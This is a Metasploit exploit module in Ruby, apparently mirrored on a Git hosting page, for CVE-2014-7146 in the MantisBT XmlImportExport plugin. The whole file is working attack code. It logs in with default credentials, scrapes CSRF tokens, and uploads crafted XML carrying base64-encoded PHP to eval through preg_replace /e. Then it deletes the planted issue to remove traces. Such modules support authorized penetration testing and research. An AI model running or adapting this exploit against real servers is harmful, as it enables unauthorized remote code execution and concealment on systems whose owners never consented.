adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
9cce7643ab147bd7ee92b10a7f9c8804cc5e4dcf
metasploit-gs/modules/exploits/multi/http/mantisbt_php_exec.rb
T
Juan Escobar 9cce7643ab update description and fix typos
2014-11-09 09:10:01 -05:00

312 lines
11 KiB
Ruby
Raw Blame History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE
def initialize(info = {})
super(update_info(info,
'Name' => 'MantisBT XmlImportExport Plugin PHP Code Injection Vulnerability',
'Description' => %q{
This module exploits a post-auth vulnerability found in MantisBT versions 1.2.0a3 up to 1.2.17 when the Import/Export plugin is installed.
The vulnerable code exists on plugins/XmlImportExport/ImportXml.php, which receives user input through the "description" field and the "issuelink" attribute of an uploaded XML file and passes to preg_replace() function with the /e modifier.
This allows a remote authenticated attacker to execute arbitrary PHP code in the remote machine.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Egidio Romano', # discovery http://karmainsecurity.com
'Juan Escobar <eng.jescobar[at]gmail.com>', # module development @itsecurityco
],
'References' =>
[
['CVE', '2014-7146']
],
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Generic (PHP Payload)', {}]],
'DisclosureDate' => 'Nov 8 2014',
'DefaultTarget' => 0))
register_options(
[
OptString.new('USERNAME', [ true, 'Username to authenticate as', 'administrator']),
OptString.new('PASSWORD', [ true, 'Pasword to authenticate as', 'root']),
OptString.new('TARGETURI', [ true, 'Base directory path', '']),
], self.class)
end
def check
res = exec_php('phpinfo(); die();', true)
if res && res.body =~ /This program makes use of the Zend/
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Unknown
end
end
def exec_php(php_code, is_check = false)
# remove comments, line breaks and spaces of php_code
payload_clean = php_code.gsub(/(\s+)|(#.*)/, '')
# clean b64 payload
while Rex::Text.encode_base64(payload_clean) =~ /=/
payload_clean = "#{ payload_clean } "
end
payload_b64 = Rex::Text.encode_base64(payload_clean)
rand_text = Rex::Text.rand_text_alpha_upper(5, 8)
rand_num = Rex::Text.rand_text_numeric(1, 9)
print_status("Checking access to MantisBT...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'login_page.php'),
'vars_get' => {
'return' => normalize_uri(target_uri.path, 'plugin.php?=XmlImportExport/import'),
}
})
unless res && res.code == 200
print_error("Error accesing to MantisBT")
return false
end
phpsessid = ' PHPSESSID' << res.get_cookies.split('PHPSESSID')[1].split('; ')[0]
print_status('Logging in...')
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'login.php'),
'headers' => {
'Cookie' => phpsessid,
},
'vars_post' => {
'return' => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import'),
'username' => datastore['username'],
'password' => datastore['password'],
'secure_session' => 'on',
}
})
unless res && res.code == 302
print_error("Login failed")
return false
end
mantis_string_cookie = ' MANTIS_STRING_COOKIE' << res.get_cookies.split('MANTIS_STRING_COOKIE')[1].split('; ')[0]
print_status("Checking XmlImportExport plugin...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'plugin.php'),
'headers' => {
'Cookie' => "#{ phpsessid } #{ mantis_string_cookie }",
},
'vars_get' => {
'page' => 'XmlImportExport/import',
}
})
unless res && res.code == 200
print_error("Error trying to access to XmlImportExport/import page...")
return false
end
# Retrieving CSRF token
if res.body =~ /name="plugin_xml_import_action_token" value="(.*)"/
csrf_token = Regexp.last_match[1]
else
print_error("Error trying to read CSRF token")
return false
end
# Retrieving default project id
if res.body =~ /name="project_id" value="([0-9]+)"/
project_id = Regexp.last_match[1]
else
print_error("Error trying to read project id")
return false
end
# Retrieving default category id
if res.body =~ /name="defaultcategory">[.|\r|\r\n]*<option value="([0-9])" selected="selected" >\(select\)<\/option><option value="1">\[All Projects\] (.*)<\/option>/
category_id = Regexp.last_match[1]
category_name = Regexp.last_match[2]
else
print_error("Error trying to read default category")
return false
end
# Retrieving default max file size
if res.body =~ /name="max_file_size" value="([0-9]+)"/
max_file_size = Regexp.last_match[1]
else
print_error("Error trying to read default max file size")
return false
end
# Retrieving default step
if res.body =~ /name="step" value="([0-9]+)"/
step = Regexp.last_match[1]
else
print_error("Error trying to read default step value")
return false
end
if is_check
timeout = 20
else
timeout = 3
end
uid = rand_text_numeric(29).to_s
data = "-----------------------------#{ uid }\r\n"
data << "Content-Disposition: form-data; name=\"plugin_xml_import_action_token\"\r\n\r\n"
data << "#{ csrf_token }\r\n"
data << "-----------------------------#{ uid }\r\n"
data << "Content-Disposition: form-data; name=\"project_id\"\r\n\r\n"
data << "#{ project_id }\r\n"
data << "-----------------------------#{ uid }\r\n"
data << "Content-Disposition: form-data; name=\"max_file_size\"\r\n\r\n"
data << "#{ max_file_size }\r\n"
data << "-----------------------------#{ uid }\r\n"
data << "Content-Disposition: form-data; name=\"step\"\r\n\r\n"
data << "#{ step }\r\n"
data << "-----------------------------#{ uid }\r\n"
data << "Content-Disposition: form-data; name=\"file\"; filename=\"#{ rand_text }.xml\r\n"
data << "Content-Type: text/xml\r\n\r\n"
data << "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n"
data << "<mantis version=\"1.2.17\" urlbase=\"http://localhost/\" issuelink=\"${eval(base64_decode(#{ payload_b64 }))}}\" notelink=\"~\" format=\"1\">\r\n"
data << " <issue>\r\n"
data << " <id>#{ rand_num }</id>\r\n"
data << " <project id=\"#{ project_id }\">#{ rand_text }</project>\r\n"
data << " <reporter id=\"#{ rand_num }\">#{ rand_text }</reporter>\r\n"
data << " <priority id=\"30\">normal</priority>\r\n"
data << " <severity id=\"50\">minor</severity>\r\n"
data << " <reproducibility id=\"70\">have not tried</reproducibility>\r\n"
data << " <status id=\"#{ rand_num }\">new</status>\r\n"
data << " <resolution id=\"#{ rand_num }\">open</resolution>\r\n"
data << " <projection id=\"#{ rand_num }\">none</projection>\r\n"
data << " <category id=\"#{ category_id }\">#{ category_name }</category>\r\n"
data << " <date_submitted>1415492267</date_submitted>\r\n"
data << " <last_updated>1415507582</last_updated>\r\n"
data << " <eta id=\"#{ rand_num }\">none</eta>\r\n"
data << " <view_state id=\"#{ rand_num }\">public</view_state>\r\n"
data << " <summary>#{ rand_text }</summary>\r\n"
data << " <due_date>1</due_date>\r\n"
data << " <description>{${eval(base64_decode(#{ payload_b64 }))}}1</description>\r\n"
data << " </issue>\r\n"
data << "</mantis>\r\n\r\n"
data << "-----------------------------#{ uid }\r\n"
data << "Content-Disposition: form-data; name=\"strategy\"\r\n\r\n"
data << "renumber\r\n"
data << "-----------------------------#{ uid }\r\n"
data << "Content-Disposition: form-data; name=\"fallback\"\r\n\r\n"
data << "link\r\n"
data << "-----------------------------#{ uid }\r\n"
data << "Content-Disposition: form-data; name=\"keepcategory\"\r\n\r\n"
data << "on\r\n"
data << "-----------------------------#{ uid }\r\n"
data << "Content-Disposition: form-data; name=\"defaultcategory\"\r\n\r\n"
data << "#{ category_id }\r\n"
data << "-----------------------------#{ uid }--\r\n\r\n"
print_status("Sending payload...")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import_action'),
'headers' => {
'Cookie' => "#{ phpsessid } #{ mantis_string_cookie }",
},
'ctype' => "multipart/form-data; boundary=---------------------------#{ uid }",
'data' => data,
}, timeout)
res_payload = res
print_status("Deleting the issue (#{ rand_text })...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'my_view_page.php'),
'headers' => {
'Cookie' => "#{ phpsessid } #{ mantis_string_cookie }",
},
})
unless res && res.code == 200
print_error("Error trying to access to My View page")
return false
end
if res.body =~ /title="\[@[0-9]+@\] #{ rand_text }">0+([0-9]+)<\/a>/
issue_id = Regexp.last_match[1]
else
print_error("Error trying to retrieve the issue id")
return false
end
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'bug_actiongroup_page.php'),
'headers' => {
'Cookie' => "#{ phpsessid } #{ mantis_string_cookie }",
},
'vars_get' => {
'bug_arr[]' => issue_id,
'action' => 'DELETE',
},
})
if res && res.body =~ /name="bug_actiongroup_DELETE_token" value="(.*)"\/>/
csrf_token = Regexp.last_match[1]
else
print_error("Error trying to retrieve CSRF token")
return false
end
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'bug_actiongroup.php'),
'headers' => {
'Cookie' => "#{ phpsessid } #{ mantis_string_cookie }",
},
'vars_post' => {
'bug_actiongroup_DELETE_token' => csrf_token,
'bug_arr[]' => issue_id,
'action' => 'DELETE',
},
})
if res && res.code == 302 || res.body !~ /Issue #{ issue_id } not found/
print_good("Issue number (#{ issue_id }) removed")
else
print_error("Removing issue number (#{ issue_id }) has failed")
return false
end
# if check return the response
if is_check
return res_payload
else
return true
end
end
def exploit
unless exec_php(payload.encoded)
fail_with(Failure::Unknown, "#{peer} - Exploit failed, aborting.")
end
end
end
Reference in New Issue View Git Blame Copy Permalink